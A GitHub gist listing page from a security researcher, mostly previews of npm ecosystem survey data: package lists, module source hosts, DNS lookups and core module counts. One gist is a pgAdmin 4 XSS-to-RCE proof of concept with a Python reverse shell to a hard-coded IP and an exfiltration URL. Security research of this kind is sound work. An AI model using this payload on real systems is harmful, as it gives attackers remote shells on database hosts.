Skip to content

Instantly share code, notes, and snippets.

View evilpacket's full-sized avatar
:octocat:

Adam Baldwin evilpacket

:octocat:
584 followers · 0 following
View GitHub Profile
@evilpacket
evilpacket / gist:5937565
Created July 5, 2013 22:10
var five = require("johnny-five"),
board;
var keypress = require('keypress');
board = new five.Board();
board.on("ready", function() {
console.log( "Ready event. Repl instance auto-initialized" );
var servo = new five.Servo(10)
@evilpacket
evilpacket / npm alternative url for module source
Created August 17, 2016 17:23
the counts for modules that have alternative url for the module (other than github or a regular package source)
220 blip.strongloop.com
135 packages.appdynamics.com
46 registry.npmjs.org
31 bitbucket.org
20 git.cobalt-engine.com
20 descinet.bbva.es
17 gitlab.hers.rs
11 appgyver-steroids.s3.amazonaws.com
@evilpacket
evilpacket / Security placeholder packages 8-23-2016
Created August 23, 2016 23:55
2klic-api-engine
360-products
65710f05-a7c1-48d1-9ee5-acdfb7f70007
69d1a00e-7f6c-40a4-ab2e-70257bcd245c-es2015
AlertLogic
AutoFixture
Basic-Material-framework
Boilerpipe-Scraper
Coflux
CornerJob
@evilpacket
evilpacket / gist:55c16b0e3d9edc0fe1a114cc16c03e68
Created November 11, 2016 22:40
var fs = require('fs');
var JSONStream = require('jsonstream');
var infile = fs.createReadStream(__dirname + '/' + process.argv[2]);
var stream = JSONStream.parse(['rows', true, 'doc'])
infile.pipe(stream);
stream.on('data', function(data) {
@evilpacket
evilpacket / botbait results
Created November 9, 2016 15:38
{
"id": 7,
"created_at": "2015-06-23T21:04:11.995Z",
"process_versions": {
"http_parser": "1.0",
"node": "0.10.13",
"v8": "3.14.5.9",
"ares": "1.9.0-DEV",
"uv": "0.10.12",
"zlib": "1.2.3",
@evilpacket
evilpacket / gist:e9f1ee472628e64ba358996106861e07
Created June 26, 2017 20:11
4633514 - path
3569836 - fs
1646083 - util
1477850 - assert
896187 - events
820144 - buffer
766000 - child_process
642174 - http
534563 - url
424279 - crypto
@evilpacket
evilpacket / gist:ee2a94b812640ce749b5a936ca243235
Created August 8, 2017 15:04
module dns requests
5752dabccfc54c4ab82aea9626b7338e.monitor-eqatec.com
7af4ds.com2.z0.glb.qiniucdn.com
7rylsh.com1.z0.glb.clouddn.com
7xojg5.com1.z0.glb.clouddn.com
7xov2q.dl1.z0.glb.clouddn.com
acsc.cs.utexas.edu
admin.brightcove.com
airdownload.adobe.com
ajax.googleapis.com
akamai.bintray.com
@evilpacket
evilpacket / Download stuff over HTTP
Created August 8, 2017 15:14
"name","version"
"tarantul","0.8.86"
"tarantul","0.8.86"
"tarantul","0.8.84"
"tarantul","0.8.84"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"youstream","0.1.2"
"zookeeper-rp","3.4.5-2"
@evilpacket
evilpacket / cmd_exec.js
Created April 16, 2017 17:43
pgAdmin 4 (1.3 and below) RCE via XSS
// select '<img src="x" onerror=$.getScript("http://127.0.0.1:8000/cmd_exec.js") />';
// multi-query payload for RCE
var queries = ['create language plpythonu','CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"162.242.167.28\\",4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\"/bin/sh\\",\\"-i\\"])\\nreturn \\"\\"\\n$$;\\n', 'select pwn()']
//queries = ['select current_user']
var exfil_url = 'http://requestb.in/16wy0z61'
@evilpacket
evilpacket / packages with bindings.gyp in root
Created May 6, 2018 21:49
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog